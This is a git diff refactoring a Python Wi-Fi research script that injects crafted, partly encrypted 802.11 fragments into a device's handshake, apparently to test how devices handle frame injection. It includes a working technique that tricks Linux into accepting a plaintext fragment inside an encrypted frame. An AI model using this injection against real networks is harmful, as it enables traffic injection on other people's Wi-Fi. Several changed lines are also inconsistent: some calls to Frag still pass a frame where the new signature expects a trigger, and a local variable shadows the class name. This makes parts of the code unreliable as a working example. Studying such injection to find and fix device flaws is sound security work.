diff --git a/research/inject.py b/research/inject.py index bc4acbd1f..586e785fa 100755 --- a/research/inject.py +++ b/research/inject.py @@ -58,7 +58,7 @@ class TestOptions(): self.routerip = None -class MetaFrag(): +class Frag(): # StartingAuth, AfterAuthRace # StartAuth: when starting the handshake # BeforeAuth: right before last message of the handshake @@ -66,18 +66,24 @@ class MetaFrag(): # Connected: 1 second after handshake completed (allows peer to install keys) StartAuth, BeforeAuth, AfterAuth, Connected = range(4) - def __init__(self, frag, trigger, encrypted, wait_rekey=False, inc_pn=1): - self.frag = frag - self.encrypted = encrypted - self.inc_pn = inc_pn - + def __init__(self, trigger, encrypted, frame=None, wait_rekey=False, inc_pn=1): self.trigger = trigger + self.encrypted = encrypted self.wait_rekey = wait_rekey -class TestCase(): - def __init__(self): - self.fragments = [] - self.verify = None + self.inc_pn = inc_pn + self.frame = frame + +class Test(): + # Type of request packet to use in general tests. + # XXX --- We should always first see how the DUT reactions to a normal packet. + # For example, Aruba only responded to DHCP after reconnecting, and + # ignored ICMP and ARP packets. + ARP, ICMP, DHCP = range(3) + + def __init__(self, fragments=None): + self.fragments = fragments if fragments != None else [] + self.check = None def next_trigger_is(self, trigger): if len(self.fragments) == 0: @@ -85,9 +91,6 @@ class TestCase(): return not self.fragments[0].wait_rekey and \ self.fragments[0].trigger == trigger - def success_on(self, payload): - self.verify = payload - def next(self): frag = self.fragments[0] del self.fragments[0] @@ -150,9 +153,10 @@ class Station(): repr(repr(p)) - if self.test.verify and self.test.verify in raw(p): + if self.test != None and self.test.check != None and self.test.check(p): log(STATUS, "SUCCESSFULL INJECTION", color="green") print(repr(p)) + self.test = Test() def send_mon(self, data, prior=1): """ @@ -233,68 +237,65 @@ class Station(): return fragments def encrypt(self, frame, inc_pn=1): + self.pn += inc_pn key, keyid = (self.tk, 0) if int(frame.addr1[1], 16) & 1 == 0 else (self.gtk, self.gtk_idx) encrypted = encrypt_ccmp(frame, key, self.pn, keyid) - self.pn += inc_pn return encrypted - def generate_test_arpping(self, trigger, num_frags=2): + def generate_request(self, ptype): header = self.get_header() - request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip) - frags = self.create_fragments(header, request, num_frags) + if ptype == Test.ARP: + # XXX --- Add extra checks on the ARP packet + check = lambda p: ARP in p and p.hwsrc == self.peermac and p.psrc == self.peerip + request = LLC()/SNAP()/ARP(op=1, hwsrc=self.mac, psrc=self.ip, hwdst=self.peermac, pdst=self.peerip) - test = TestCase() - for frag in frags: - test.fragments.append(MetaFrag(frag, trigger, False)) + elif ptype == Test.ICMP: + label = b"test_ping_icmp" + check = lambda p: ICMP in p and label in raw(p) + request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(label) + elif ptype == Test.DHCP: + xid = random.randint(0, 2**31) + check = lambda p: BOOTP in p and p[BOOTP].xid == xid + + rawmac = bytes.fromhex(self.mac.replace(':', '')) + request = LLC()/SNAP()/IP(src="0.0.0.0", dst="255.255.255.255") + request = request/UDP(sport=68, dport=67)/BOOTP(op=1, chaddr=rawmac, xid=xid) + request = request/DHCP(options=[("message-type", "discover"), "end"]) + + # We assume DHCP discover is sent towards the AP. + # XXX Is there an equivalent for against the client? Response to DHCP Discover/Request? + header.addr3 = "ff:ff:ff:ff:ff:ff" + + return header, request, check + + def generate_test_ping(self, ptype, frags): + test = Test(frags) + header, request, test.check = self.generate_request(ptype) + + frames = self.create_fragments(header, request, len(frags)) + for frag, frame in zip(frags, frames): + frag.frame = frame return test - def generate_test_ping(self, trigger, num_frags=2, encrypted=True): - magic = b"generate_test_ping" + def generate_linux_attack_ping(self, ptype): + test = Test() + header, request, test.check = self.generate_request(ptype) + header = self.get_header() - request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic) - frags = self.create_fragments(header, request, num_frags) - - test = TestCase() - for frag in frags: - test.fragments.append(MetaFrag(frag, trigger, encrypted)) - test.success_on(magic) - - return test - - def generate_test_ping_mixed(self): - magic = b"generate_test_ping" - header = self.get_header() - request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic) frag1, frag2 = self.create_fragments(header, request, 2) - #frag1.addr1 = "ff:ff:ff:ff:ff:ff" - #frag2.addr1 = "ff:ff:ff:ff:ff:ff" - - test = TestCase() - test.fragments.append(MetaFrag(frag1, MetaFrag.AfterAuth, False)) - test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True)) - test.success_on(magic) - - return test - - def generate_linux_attack_ping(self): - magic = b"generate_test_ping" - - header = self.get_header() - request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic) - frag1, frag2 = self.create_fragments(header, request, 2) - - test = TestCase() - test.fragments.append(MetaFrag(frag1, MetaFrag.AfterAuth, True)) + # Fragment 1: normal + test.fragments.append(Frag(frag1, Frag.Connected, True)) + # Fragment 2: make Linux update latest used crypto Packet Number frag2enc = frag2.copy() frag2enc.SC ^= (1 << 4) | 1 - test.fragments.append(MetaFrag(frag2enc, MetaFrag.AfterAuth, True)) + test.fragments.append(Frag(frag2enc, Frag.Connected, True)) - test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, False)) + # Fragment 3: can now inject last fragment as plaintext + test.fragments.append(Frag(frag2, Frag.Connected, False)) - test.success_on(magic) return test def generate_test_eapol(self, num_bytes=16, num_frags=1): @@ -302,9 +303,9 @@ class Station(): request = LLC()/SNAP()/EAPOL()/EAP()/Raw(b"A"*32) frags = self.create_fragments(header, request, num_frags) - test = TestCase() + test = Test() for frag in frags: - test.fragments.append(MetaFrag(frag), MetaFrag.StartAuth, False) + test.fragments.append(Frag(frag), Frag.StartAuth, False) return test @@ -321,37 +322,29 @@ class Station(): # To generate the tests we need to know the MAC and IP addresses - test = TestCase() - #test.fragments.append(MetaFrag(frag1, MetaFrag.BeforeAuth, False)) - #test.fragments.append(MetaFrag(frag2copy, MetaFrag.BeforeAuth, False)) - #test.fragments.append(MetaFrag(frag2copy, MetaFrag.AfterAuth, False)) - test.fragments.append(MetaFrag(header/LLC()/SNAP()/IP()/ICMP(), MetaFrag.AfterAuth, False)) - #test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True)) - - return test - - def generate_test_rekey(self): - magic = b"rekey_attack" - header = self.get_header() - request = LLC()/SNAP()/IP(src=self.ip, dst=self.peerip)/ICMP()/Raw(magic) - frag1, frag2 = self.create_fragments(header, request, 2) - - test = TestCase() - test.fragments.append(MetaFrag(frag1, MetaFrag.BeforeAuth, True, wait_rekey=True)) - test.fragments.append(MetaFrag(frag2, MetaFrag.AfterAuth, True)) - test.success_on(magic) + test = Test() + #test.fragments.append(Frag(frag1, Frag.BeforeAuth, False)) + #test.fragments.append(Frag(frag2copy, Frag.BeforeAuth, False)) + #test.fragments.append(Frag(frag2copy, Frag.AfterAuth, False)) + test.fragments.append(Frag(header/LLC()/SNAP()/IP()/ICMP(), Frag.AfterAuth, False)) + #test.fragments.append(Frag(frag2, Frag.AfterAuth, True)) return test def generate_tests(self): - #self.test = self.generate_test_arpping(MetaFrag.AfterAuth) - #self.test = self.generate_test_ping(MetaFrag.AfterAuth, num_frags=1, encrypted=True) + self.test = self.generate_test_ping(Test.DHCP, + [Frag(Frag.Connected, True)]) + #Frag(Frag.Connected, True)]) + + #self.test = self.generate_test_ping(Test.DHCP, + # [Frag(Frag.BeforeAuth, True, wait_rekey=True), + # Frag(Frag.AfterAuth, True)]) + #self.text = self.generate_test_eapol() #self.test = self.generate_test_eapol_debug() - #self.test = TestCase() - #self.test = self.generate_test_ping_mixed() + #self.test = Test() #self.test = self.generate_linux_attack_ping() - self.test = self.generate_test_rekey() + #self.test = self.generate_test_rekey() # - Test case to check if the receiver supports interleaved priority # reception. It seems Windows 10 / Intel might not support this. @@ -382,18 +375,18 @@ class Station(): self.reset_keys() def inject_next_frags(self, trigger): - frag = None + frame = None while self.test.next_trigger_is(trigger): - metafrag = self.test.next() - if metafrag.encrypted: + Frag = self.test.next() + if Frag.encrypted: assert self.tk != None and self.gtk != None - frag = self.encrypt(metafrag.frag, inc_pn=metafrag.inc_pn) + frame = self.encrypt(Frag.frame, inc_pn=Frag.inc_pn) log(STATUS, "Encrypted fragment with key " + self.tk.hex()) else: - frag = metafrag.frag - self.daemon.inject_mon(frag) - print("[Injected fragment]", repr(frag)) + frame = Frag.frame + self.daemon.inject_mon(frame) + print("[Injected fragment]", repr(frame)) # With ath9k_htc devices, there's a bug when injecting a frame with the # More Fragments (MF) field *and* operating the interface in AP mode @@ -406,7 +399,7 @@ class Station(): # Note: when the device is only operating in monitor mode, this does # not seem to be a problem. # - if self.options.inject_workaround and frag != None and frag.FCfield & 0x4 != 0: + if self.options.inject_workaround and frame != None and frame.FCfield & 0x4 != 0: self.daemon.inject_mon(Dot11(addr1="ff:ff:ff:ff:ff:ff")) print("[Injected packet] Prevent ath9k_htc bug after fragment injection") @@ -420,15 +413,15 @@ class Station(): # Inject any fragments before authenticating if not self.txed_before_auth: - log(STATUS, "MetaFrag.StartAuth", color="green") - self.inject_next_frags(MetaFrag.StartAuth) + log(STATUS, "Frag.StartAuth", color="green") + self.inject_next_frags(Frag.StartAuth) self.txed_before_auth = True self.txed_before_auth_done = False # Inject any fragments when almost done authenticating elif is_msg3_or_4 and not self.txed_before_auth_done: - log(STATUS, "MetaFrag.BeforeAuth", color="green") - self.inject_next_frags(MetaFrag.BeforeAuth) + log(STATUS, "Frag.BeforeAuth", color="green") + self.inject_next_frags(Frag.BeforeAuth) self.txed_before_auth_done = True self.txed_before_auth = False @@ -441,7 +434,7 @@ class Station(): # - This is also important because the station might have already installed the # key before this script can send the EAPOL frame over Ethernet (but we didn't # yet request the key from this script). - # - Send with high priority, otherwise MetaFrag.AfterAuth might be send before + # - Send with high priority, otherwise Frag.AfterAuth might be send before # the EAPOL frame by the Wi-Fi chip. self.send_mon(eapol) @@ -452,8 +445,8 @@ class Station(): if not self.obtained_ip: return - log(STATUS, "MetaFrag.AfterAuth", color="green") - self.inject_next_frags(MetaFrag.AfterAuth) + log(STATUS, "Frag.AfterAuth", color="green") + self.inject_next_frags(Frag.AfterAuth) self.time_connected = time.time() + 1 @@ -465,8 +458,8 @@ class Station(): def handle_connected(self): """This is called ~1 second after completing the handshake""" - log(STATUS, "MetaFrag.Connected", color="green") - self.inject_next_frags(MetaFrag.Connected) + log(STATUS, "Frag.Connected", color="green") + self.inject_next_frags(Frag.Connected) #self.daemon.rekey(self) self.check_rekey() @@ -710,7 +703,7 @@ class Authenticator(Daemon): self.apmac = scapy.arch.get_if_hwaddr(self.nic_iface) def configure_daemon(self): - # Intercept EAPOL packets that the client wants to send + # Intercept EAPOL packets that the AP wants to send wpaspy_command(self.wpaspy_ctrl, "SET ext_eapol_frame_io 1") # Let scapy handle DHCP requests